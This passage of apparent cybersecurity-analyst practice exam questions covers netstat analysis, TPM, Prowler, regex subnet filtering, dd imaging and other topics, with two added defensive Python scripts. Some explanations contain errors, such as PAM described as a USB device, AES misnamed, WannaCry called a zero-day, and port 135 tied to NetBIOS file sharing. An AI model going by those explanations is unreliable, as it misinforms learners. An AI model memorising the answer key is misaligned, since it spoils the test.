TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED
TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED
Based on this output, which of the following entries is suspicious? (SELECT THREE)
TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used by DNS servers to receive requests, and an employee's workstation running DNS would be unusual. If the foreign address were using port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The two entries from a random high-numbered port to a web server (port 80 and port 443) are normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high-numbered port chosen by the workstation to conduct two-way communications.
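The rule the explanation applies, that a client's own side of a connection should sit in the ephemeral range while a low local port means the host is acting as a server, can be turned into a quick triage script. The following is an added example, not part of the practice exam: it parses the netstat lines from the question (plus the two LISTENING entries that appear only in the answer choices, embedded as a constructed sample) and classifies each row as normal client traffic, an expected workstation listener, or a row to review. The workstation baseline set and the Windows ephemeral floor of 49152 are assumptions for this example.

```python
import re

# Constructed sample: the rows from the question plus the two LISTENING rows that
# appear only in the answer choices (0.0.0.0:53 and 0.0.0.0:135).
SAMPLE_NETSTAT = """\
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED
TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED
TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED
TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED
"""

# Local ports a domain-joined Windows workstation is expected to hold open
# (assumed baseline for this example: RPC/NetBIOS/SMB and WSD on 5357).
WORKSTATION_BASELINE_PORTS = {135, 137, 138, 139, 445, 5357}
EPHEMERAL_FLOOR = 49152  # start of the Windows dynamic (client) port range

# netstat -an style row: PROTO LOCAL:PORT FOREIGN:PORT [STATE]; UDP rows with *:* are skipped.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\d+)\s*(\S+)?\s*$")


def parse_netstat(text):
    """Parse netstat rows into dicts with integer ports; unparseable lines are dropped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, faddr, fport, state = m.groups()
        rows.append({"proto": proto, "laddr": laddr, "lport": int(lport),
                     "faddr": faddr, "fport": int(fport), "state": state or ""})
    return rows


def classify(row, baseline=WORKSTATION_BASELINE_PORTS):
    """'client' if the local port is ephemeral (the workstation initiated the session),
    'baseline' if it is an expected workstation listener, otherwise 'review'."""
    if row["lport"] >= EPHEMERAL_FLOOR:
        return "client"
    if row["lport"] in baseline:
        return "baseline"
    return "review"  # low local port outside the baseline: the host is serving something


def flag_suspicious(text, baseline=WORKSTATION_BASELINE_PORTS):
    """Return the rows whose local port marks the workstation as a server for a
    service it should not be running (port 53 in the question)."""
    return [r for r in parse_netstat(text) if classify(r, baseline) == "review"]


def summarize(text, baseline=WORKSTATION_BASELINE_PORTS):
    """Count rows per class so a quick glance shows how much needs a closer look."""
    counts = {"client": 0, "baseline": 0, "review": 0}
    for r in parse_netstat(text):
        counts[classify(r, baseline)] += 1
    return counts


if __name__ == "__main__":
    for r in flag_suspicious(SAMPLE_NETSTAT):
        print(f"review: local {r['laddr']}:{r['lport']} <-> {r['faddr']}:{r['fport']} {r['state']}")
    print(summarize(SAMPLE_NETSTAT))
```

The three rows it returns are exactly the three port-53 entries the answer names. The baseline set is the part that needs tuning per environment; on a host that legitimately runs a local resolver, port 53 would be added to it and the check would stay quiet.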
William would like to use full-disk encryption on his laptop. He is worried about slow performance, though, so he has requested that the laptop have an onboard hardware-based cryptographic processor. Based on this requirement, what should William ensure the laptop contains? PAM TPM FDE AES
TPM This question is really asking if you know what each acronym means. Trusted Platform Module (TPM) is a hardware-based cryptographic processing component that is a part of the motherboard. A Pluggable Authentication Module (PAM) is a device that looks like a USB thumb drive and is used as a software key in cryptography. Full Disk Encryption (FDE) can be hardware or software-based. Therefore, it isn't the right answer. The Advanced Encryption System (AES) is a cryptographic algorithm. Therefore, it isn't a hardware solution.
Your organization has recently carried out a cloud security assessment using the Prowler tool and you are in charge of interpreting the results. You notice that several checks related to AWS Identity and Access Management (IAM) are flagged as FAIL. What does this likely indicate? There may be potential issues with the security configurations in the IAM services The Prowler tool is malfunctioning The AWS S3 services are misconfigured The cloud environment is completely secure
There may be potential issues with the security configurations in the IAM services Prowler is an AWS security best practices assessment, auditing, hardening, and forensics readiness tool. It checks the configuration of various AWS services and flags any potential security concerns. If Prowler flags IAM checks as FAIL, it likely indicates problems with IAM configurations such as overly permissive policies, unrotated keys, or unused IAM roles. While it's possible that any tool can malfunction, Prowler's output is generally reliable. A FAIL flag typically indicates an issue that needs to be addressed rather than a tool malfunction. Although Prowler does also check the configurations of AWS S3 services, a FAIL in the IAM checks specifically points to potential issues within IAM services. It does not directly suggest any issues with S3 configurations. The presence of multiple FAIL flags, especially in IAM related checks, suggests there are potential security issues that need to be addressed. It does not mean the cloud environment is completely secure.
In a network vulnerability assessment report, several zero-day and critical vulnerabilities were discovered. Why might this necessitate immediate action? Because they signal a need to decrease the frequency of vulnerability assessments These vulnerabilities present significant risk due to no current security fix being available Because they indicate a need to hire more staff Because zero-day and critical vulnerabilities improve the system's performance
These vulnerabilities present significant risk due to no current security fix being available Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a system's security. One example of a zero-day virus that caused significant havoc is the "WannaCry" ransomware. It exploited a vulnerability in the Windows operating system, spreading rapidly across networks and encrypting files, demanding ransom payments in exchange for decryption. These types of vulnerabilities are significant threats, not performance enhancers. While additional resources might be needed for vulnerability management, the presence of critical vulnerabilities doesn't directly indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for more frequent and thorough assessments.
How do service level objectives (SLOs) contribute to incident response? They provide a detailed timeline of the incident They estimate the financial loss due to the incident They identify the root cause of the incident They define expectations for incident response times and quality, providing clear targets for the response team
They define expectations for incident response times and quality, providing clear targets for the response team SLOs set the expected standards for incident response, such as response times, thereby providing clear targets and performance benchmarks for the response team. SLOs set expectations for incident response performance; they are not designed to estimate financial loss from an incident. SLOs set performance standards and expectations; they do not directly contribute to identifying the root cause of an incident. While SLOs can guide the timeline of the response, they do not provide a detailed timeline of the incident.
A cybersecurity analyst at Yoyodyne Systems just finished reading a news article about their competitor, Whamiedyne Systems, being hacked by an unknown threat actor. Both companies sell to the same basic group of consumers over the internet since their products are used interchangeably by consumers. Which of the following is a valid cybersecurity concern for Yoyodyne Systems? The attacker will conduct a SQL injection against their database The same vulnerability will be compromised on their servers The attacker will conduct a man-in-the-middle attack They may now be vulnerable to a credential stuffing attack
They may now be vulnerable to a credential stuffing attack The largest and most immediate cybersecurity concern that the analyst should have is credential stuffing. Credential stuffing occurs when an attacker tests username and password combinations against multiple online sites. Since both companies share a common consumption group, it is likely that some of Yoyodyne's consumers also had a user account at Whamiedyne. If the attackers compromised the username and passwords from Whamiedyne's servers, they might attempt to use those credentials on Yoyodyne's servers, too. There is no definitive reason to believe that both companies are using the same infrastructure. Therefore, the same vulnerability that was exploited by the attacker may not exist at Yoyodyne. The question doesn't mention an SQL database. Therefore, there is no direct threat of an SQL injection. A man-in-the-middle (MitM) attack occurs when the attacker sits between two communicating hosts and transparently captures, monitors, and relays all communications between the host. Nothing in this question indicates that a MitM was utilized or is a possible threat.
Why is regular vulnerability management reporting critical to an organization's security posture? It's key to improving the company's stock performance It's essential for enhancing the company's brand image It's primarily important for increasing employee productivity To aid in effective prioritization and remediation
To aid in effective prioritization and remediation Regular reporting provides ongoing visibility into system vulnerabilities, aiding in effective prioritization and remediation strategies. While robust security can indirectly contribute to a company's overall performance, the immediate goal of vulnerability management reporting is to aid in maintaining a secure system. While strong security can enhance a company's reputation, the primary objective of vulnerability management reporting is to ensure effective security management. While productivity is a vital organizational goal, the primary aim of vulnerability management reporting is to maintain awareness of the system's security status.
Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? User and entity behavior analytics Installation of anti-virus tools Use of a host-based IDS or IPS Implement endpoint protection platforms
User and entity behavior analytics Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.
Which of the following techniques would best mitigate malware that utilizes a fast flux network for its command and control infrastructure? Conduct detailed statistical analysis of the structure of domain names to detect anomalies Blacklisting known malicious domain names Blacklisting known malicious IP addresses Utilize a secure recursive DNS resolver to a third-party secure DNS resolver
Utilize a secure recursive DNS resolver to a third-party secure DNS resolver Third-party DNS resolvers, particularly those of ISPs, will typically have elaborate algorithms designed to detect command and control (C2) via fast flux networks. Fast flux DNS utilizes a technique that rapidly changes the IP address associated with a domain to allow an adversary to defeat IP-based blacklists. Often, these fast flux networks have communication patterns that might be detectable, though. While in-house statistical analysis might be possible (and could be done in parallel), the commercial resources available to a large scale ISP or dedicated secure DNS providers will be better tailored to combatting this issue.
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment? Sandboxing Virtualization Purchase additional workstations Bypass testing and deploy patches directly into the production environment
Virtualization When you have a limited amount of hardware resources to utilize but have a requirement to test multiple operating systems, you should set up a virtualized environment to test the patch across each operating system before deployment. You should never deploy patches directly into production without testing them first in the lab.
A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? Web application vulnerability scan Network vulnerability scan Port scan Database vulnerability scan
Web application vulnerability scan Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn't contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.
You have evidence to believe that an attacker was scanning your network from an IP address at 172.16.1.224. This network is part of a /26 subnet. You wish to quickly filter through several logs using a REGEX for anything that came from that subnet. What REGEX expression would provide the appropriate output when searching the logs for any traffic originating from only IP addresses within that subnet? \b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b \b172\.16\.1\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b \b172\.16\.1\.(25[0-5]|2[0-4][0-9]|19[2-9])\b \b172\.16\.1\.(25[0-5]|2[0-4][0-9]?)\b
\b172\.16\.1\.(25[0-5]|2[0-4][0-9]|19[2-9])\b The correct answer is \b172\.16\.1\.(25[0-5]|19[2-9]|2[0-4][0-9])\b. The \b delimiter indicates that we are looking for whole words for the complete string. To answer this question, you have to rely on your networking knowledge and what you learned back in Network+. First, you need to calculate the IP range for this subnet. Since this is a /26, it would have 64 IP addresses in the range. Since the IP provided was 172.16.1.224, the range would be 172.16.1.192 to 172.16.1.255. The correct answer allows all values of 200-249 through the use of the phrase 2[0-4][0-9]. The values of 250-255 are specified by 25[0-5]. The values of 192-199 are specified through the use of 19[2-9]. All other REGEX expressions either allow too much or too little of the available IP space to be effective and precise filters for the subnet given. If you had this on the exam, I would calculate the IP address range first (as we did in this explanation). Then, I would see which parts are static in the IP address (172.16.1. in this case). Three of our answer choices provide this, so we now know the large REGEX is the wrong answer. Next, we need to figure out how to show only the values of 192-255. As you look at the three options, you need to look for the differences only between the options and see which would allow for the addresses needed. All three options have the same two first terms in the last octet, which covers 200-255, so you really need to determine how to represent the values of 192-199 best.
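The explanation's method (fix the static octets, then express the last-octet range as decade-aligned alternatives) generalizes to any IPv4 prefix of /24 or longer. The following is an added example, not part of the practice exam: it builds the last-octet alternation from a CIDR with the ipaddress module, produces the same three terms as the page's answer for 172.16.1.224/26, and then checks each of the page's candidate patterns against constructed log lines for all 256 possible last octets so that "too much" and "too little" become exact counts. The log line format and the function names are assumptions for this example.

```python
import ipaddress
import re


def _band_regex(lo, hi):
    """Alternation for integers lo..hi that all have the same number of digits."""
    width = len(str(lo))
    if width == 1:
        return f"[{lo}-{hi}]" if hi > lo else str(lo)
    parts = []
    n = lo
    while n <= hi:
        if n % 10 == 0 and n + 9 <= hi:
            # Whole decades: extend over as many full decades as fit in this hundred.
            base = n - n % 100
            t0 = (n // 10) % 10
            t1 = t0
            while t1 < 9 and base + (t1 + 1) * 10 + 9 <= hi:
                t1 += 1
            head = str(n // 100) if width == 3 else ""
            tens = str(t0) if t0 == t1 else f"[{t0}-{t1}]"
            parts.append(f"{head}{tens}[0-9]")
            n = base + t1 * 10 + 10
        else:
            # Partial decade: keep the leading digits, range the units digit.
            end = min(hi, n - n % 10 + 9)
            stem = str(n)[:-1]
            units = f"[{n % 10}-{end % 10}]" if end > n else str(n % 10)
            parts.append(f"{stem}{units}")
            n = end + 1
    return "|".join(parts)


def range_regex(lo, hi):
    """Regex alternation matching exactly the decimal integers lo..hi within 0..255."""
    if not 0 <= lo <= hi <= 255:
        raise ValueError("range must lie within 0..255")
    bands = [(lo, min(hi, 9)), (max(lo, 10), min(hi, 99)), (max(lo, 100), hi)]
    return "|".join(_band_regex(a, b) for a, b in bands if a <= b)


def subnet_regex(cidr):
    """Word-bounded regex for every address in an IPv4 subnet of /24 or longer."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.version != 4 or net.prefixlen < 24:
        raise ValueError("only IPv4 prefixes of /24 or longer are supported")
    first = int(net.network_address) & 0xFF
    last = int(net.broadcast_address) & 0xFF
    prefix = ".".join(str(net.network_address).split(".")[:3])
    return rf"\b{re.escape(prefix)}\.(?:{range_regex(first, last)})\b"


def matching_last_octets(pattern, prefix):
    """Run pattern over a constructed log line for prefix.0 .. prefix.255 and return
    the set of last octets it matched."""
    rx = re.compile(pattern)
    hits = set()
    for i in range(256):
        line = f"Jun 12 09:24:12 fw1 DENY src={prefix}.{i} dst=10.0.0.1 proto=TCP"  # constructed
        if rx.search(line):
            hits.add(i)
    return hits


def verify_subnet_regex(cidr):
    """True when subnet_regex(cidr) matches exactly the subnet's addresses, no more, no less."""
    net = ipaddress.ip_network(cidr, strict=False)
    prefix = ".".join(str(net.network_address).split(".")[:3])
    expected = {int(a) & 0xFF for a in net}
    return matching_last_octets(subnet_regex(cidr), prefix) == expected


# The page's candidate patterns, for comparison.
PAGE_ANSWER = r"\b172\.16\.1\.(25[0-5]|2[0-4][0-9]|19[2-9])\b"
OPTION_TOO_BROAD = r"\b172\.16\.1\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
OPTION_TOO_NARROW = r"\b172\.16\.1\.(25[0-5]|2[0-4][0-9]?)\b"

if __name__ == "__main__":
    print(subnet_regex("172.16.1.224/26"))
    for name, pat in [("answer", PAGE_ANSWER), ("broad", OPTION_TOO_BROAD), ("narrow", OPTION_TOO_NARROW)]:
        print(name, len(matching_last_octets(pat, "172.16.1")), "addresses matched")
```

One caveat worth carrying into real log searches: \b is a word boundary, not an address boundary, so the pattern would also match inside a longer dotted string such as 10.172.16.1.200. Replacing the leading \b with a lookbehind like (?<![\d.]) and the trailing \b with (?![\d.]) closes that gap in engines that support lookaround.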
What command should a forensic analyst use to make a forensic disk image of a hard drive? touch dd wget rm
dd The dd tool is used to make bit by bit copies of a disk, drive, or partition. Once the image is created using dd, a hash of the file should be made and placed into evidence to validate the integrity of the disk image that was created. This will ensure that no modification occurs between the collection and analysis of the disk image. The wget command is a command-line utility for downloading files from the Internet. The touch command is a standard command used in the UNIX/Linux operating system used to create, change, and modify timestamps of a file. The rm command is used to delete one or more files or directories.
Which of the following would be used to prevent a firmware downgrade? eFUSE TPM HSM SED
eFUSE eFUSE is an Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip. One use of this is to prevent firmware downgrades, implemented on some game consoles and smartphones. Each time the firmware is upgraded, the updater blows an eFUSE. When there is a firmware update, the updater checks that the number of blown eFUSEs is not less than the firmware version number. A self-encrypting drive (SED) uses cryptographic operations performed by the drive controller to encrypt a storage device's contents. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. The TPM is implemented either as part of the chipset or as an embedded function of the CPU. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. An HSM solution may be less susceptible to tampering and insider threats than software-based storage.
You are a cybersecurity analyst investigating a potential network issue at your company. You suspect there is unusual traffic on your company's network. Which of the following tools would be most effective for capturing and analyzing network packets in real-time to investigate this issue? Nmap Wireshark Ping tcpdump
tcpdump tcpdump is primarily used for capturing and analyzing network packets in real-time, which would be effective for investigating unusual network traffic. Nmap is primarily used for network discovery and security auditing. It can identify what hosts are available on the network, what services those hosts are offering, what operating systems they are running, and what type of packet filters/firewalls are in use. It doesn't focus on real-time packet analysis. While Wireshark is also a network protocol analyzer, it provides a GUI and more detailed analysis features than tcpdump. However, for quick, real-time traffic analysis, tcpdump is more lightweight and often preferred. Ping is a basic network tool used to test whether a particular host is reachable across an IP network and to measure the round-trip time for packets. It doesn't provide real-time traffic analysis.